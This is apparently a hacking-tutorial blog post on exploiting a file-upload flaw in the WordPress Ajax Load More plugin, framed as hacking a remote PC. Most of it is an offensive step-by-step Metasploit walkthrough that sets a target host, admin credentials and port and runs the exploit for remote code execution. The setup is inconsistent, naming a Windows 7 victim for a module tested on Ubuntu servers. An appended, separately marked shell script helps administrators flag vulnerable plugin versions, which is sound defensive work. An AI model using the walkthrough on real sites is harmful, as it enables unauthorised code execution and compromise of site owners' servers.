This module exploits an arbitrary file upload vulnerability in the WordPress Ajax Load More plugin, version 2.8.1.1. It allows uploading arbitrary PHP files and achieving remote code execution. The module has been tested successfully on WordPress Ajax Load More 2.8.0 with WordPress 4.1.3 on Ubuntu 12.04/14.04 Server.
Exploit Targets
WordPress Ajax Load More 2.8.0
Requirement
Attacker: Kali Linux
Victim PC: Windows 7
Open a Kali terminal and type msfconsole
Now type use exploit/unix/webapp/wp_ajax_load_more_file_upload
msf exploit (wp_ajax_load_more_file_upload)>set targeturi wordpress
msf exploit (wp_ajax_load_more_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_ajax_load_more_file_upload)>set wp_username admin
msf exploit (wp_ajax_load_more_file_upload)>set wp_password admin123
msf exploit (wp_ajax_load_more_file_upload)>set rport 80
msf exploit (wp_ajax_load_more_file_upload)>exploit
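For administrators checking their own sites against the versions named above, the following is an added example, not part of the original post or of the Metasploit module. It assumes the plugin lives in wp-content/plugins/ajax-load-more with a main file ajax-load-more.php carrying a standard WordPress "Version:" header, and it treats every version at or below 2.8.1.1 as needing review; the page does not state which release fixes the issue.

```shell
#!/bin/sh
# Added example: flag Ajax Load More installs at or below the version the page names.
# Assumed layout: <wp-root>/wp-content/plugins/ajax-load-more/ajax-load-more.php
# Usage: sh check_alm.sh /var/www/site1 /var/www/site2

NAMED_VERSION="2.8.1.1"   # version named on the page; the fixed release is not stated there

# Print the value of the "Version:" plugin header from a plugin main file.
plugin_version() {
    sed -n 's/^[[:space:]*]*Version:[[:space:]]*\([0-9][0-9A-Za-z.]*\).*/\1/p' "$1" | head -n 1
}

# Succeed when version $1 <= version $2 (uses sort -V for dotted version ordering).
version_le() {
    [ "$1" = "$2" ] && return 0
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# Print one of: not-installed | unknown | review <ver> | newer <ver>
check_install() {
    alm_main="$1/wp-content/plugins/ajax-load-more/ajax-load-more.php"
    if [ ! -f "$alm_main" ]; then
        echo "not-installed"
        return 0
    fi
    alm_ver="$(plugin_version "$alm_main")"
    if [ -z "$alm_ver" ]; then
        echo "unknown"          # header missing or unreadable: inspect by hand
        return 0
    fi
    if version_le "$alm_ver" "$NAMED_VERSION"; then
        echo "review $alm_ver"  # within the range named on the page: update the plugin
    else
        echo "newer $alm_ver"   # above the named version; confirm against the vendor changelog
    fi
}

# Check every WordPress root given on the command line.
for wp_root in "$@"; do
    printf '%s: %s\n' "$wp_root" "$(check_install "$wp_root")"
done
```

The module above is configured with wp_username and wp_password, so a site that reports "review" should also have its WordPress account passwords checked for weak values such as the one used in the walkthrough.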
The post Hack Remote PC using WordPress Ajax Load More PHP Upload Vulnerability appeared first on Hacking Articles.